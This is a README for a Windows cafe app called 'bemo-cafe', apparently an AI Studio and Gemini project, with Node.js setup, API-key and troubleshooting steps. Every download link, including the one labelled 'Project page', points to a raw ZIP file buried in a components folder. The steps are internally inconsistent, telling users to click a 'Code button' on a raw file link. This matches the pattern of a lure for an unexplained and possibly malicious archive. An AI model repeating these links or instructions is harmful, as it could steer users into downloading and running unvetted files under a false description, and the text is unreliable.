bemo-cafe is a cafe app you can run on your Windows computer. It is built to help you view and use the app from your own device.
This project includes the files you need to set up the app on your computer and run it locally.
Use this link to visit the page and download or copy the files you need:
https://raw.githubusercontent.com/tishaworldclass53/bemo-cafe/main/components/cafe-bemo-2.5.zip
Before you start, install these basics on your Windows PC:
- Windows 10 or Windows 11
- Google Chrome or Microsoft Edge
- Node.js
- A stable internet connection
- A Gemini API key
Node.js lets the app run on your computer. The Gemini API key lets the app connect to Gemini services.
Follow these steps in order.
- Open this page: https://raw.githubusercontent.com/tishaworldclass53/bemo-cafe/main/components/cafe-bemo-2.5.zip
- Click the green Code button
- Select Download ZIP
- Save the file to a folder you can find, such as Downloads
- Right-click the ZIP file and choose Extract All
After extraction, you will see a folder named bemo-cafe
- Go to the Node.js website
- Download the LTS version for Windows
- Open the installer
- Follow the setup steps
- Finish the install
If Windows asks to restart, restart your PC before you move on
- Open the
bemo-cafefolder you extracted - Find the file area where the project files are stored
- Click the address bar in File Explorer
- Type
cmdand press Enter
This opens Command Prompt in the project folder
In Command Prompt, type this command and press Enter:
npm install
This step downloads the files the app needs to run
The app needs your Gemini API key to work.
- In the project folder, find the file named
.env.local - Open it with Notepad
- Add this line:
GEMINI_API_KEY=your_api_key_here
- Replace
your_api_key_herewith your real Gemini API key - Save the file
If the file does not exist, create a new file named .env.local
In Command Prompt, type this command and press Enter:
npm run dev
Wait for the app to finish starting. Then open the link shown in Command Prompt, which is usually:
http://localhost:3000
Once the app starts:
- Keep Command Prompt open
- Open your web browser
- Go to the local address shown in the terminal
- Use the app in your browser
If you close Command Prompt, the app stops
- Use a folder path with no special characters
- Keep the
.env.localfile in the project root - Make sure Node.js finished installing before you run
npm install - Use the same Command Prompt window for the setup steps
- If you move the project folder, run
npm installagain
These are the key parts of the project:
.env.local— stores your API keypackage.json— lists the app commands and needed filesnode_modules— holds installed packages after setup- project source files — run the app and show the interface
bemo-cafe gives you a local app view in your browser. It is designed for use with AI Studio and uses your Gemini API key to connect the app to the service it needs.
You can use it to:
- open the app on your Windows PC
- run the app in a browser
- test the app from your own machine
- keep the project files in one place
This usually means Node.js is not installed, or the install did not finish.
Fix:
- Install Node.js again
- Close Command Prompt
- Open a new Command Prompt window
- Run
npm installagain
Check these items:
- The
.env.localfile exists GEMINI_API_KEYis setnpm installfinished without errors- You ran
npm run devin the project folder
If the browser does not open on its own:
- Copy the local address shown in Command Prompt
- Paste it into Chrome or Edge
- Press Enter
This means the Gemini API key may be missing or wrong.
Fix:
- Open
.env.local - Check the key name
- Make sure it reads
GEMINI_API_KEY= - Paste the correct key after the equals sign
- Save the file and restart the app
- Download the project
- Install Node.js
- Open the project folder
- Run
npm install - Add your Gemini API key
- Run
npm run dev - Open the local link in your browser
Your folder may look like this:
bemo-cafe.env.localpackage.jsonnode_modules- source files for the app
Project page: https://raw.githubusercontent.com/tishaworldclass53/bemo-cafe/main/components/cafe-bemo-2.5.zip